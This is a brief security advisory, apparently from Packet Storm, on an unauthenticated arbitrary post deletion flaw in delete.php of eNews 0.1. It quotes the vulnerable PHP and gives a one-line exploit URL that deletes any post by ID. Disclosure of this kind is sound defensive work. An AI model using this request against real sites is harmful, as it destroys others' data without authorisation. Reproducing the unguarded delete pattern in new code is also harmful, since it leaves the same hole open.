eNews version 0.1 suffers from an arbitrary delete post vulnerability in delete.php.
794ca32689e7445066f331f1919650a90f0b737569425c38e322231c90583542eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability
Author: iLker Kandemir [MEFISTO]
Script download : http://www.hotscripts.com/Detailed/81086.html
script demo : http://emvvy.com/demos/enews/
site : www.dumenci.net
----------------------------------------------------------------
//poc:
if ((isset($_GET['delete'])) && ($_GET['delete'] != "")) {
$deleteSQL = sprintf("DELETE FROM news WHERE id=%s",
GetSQLValueString($_GET['delete'], "int"));
----------------------------------------------------------------
//exploit :
http://[site]/delete.php?delete=[eNews_id]
----------------------------------------------------------------
tnx : aLL my FriEndZ
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed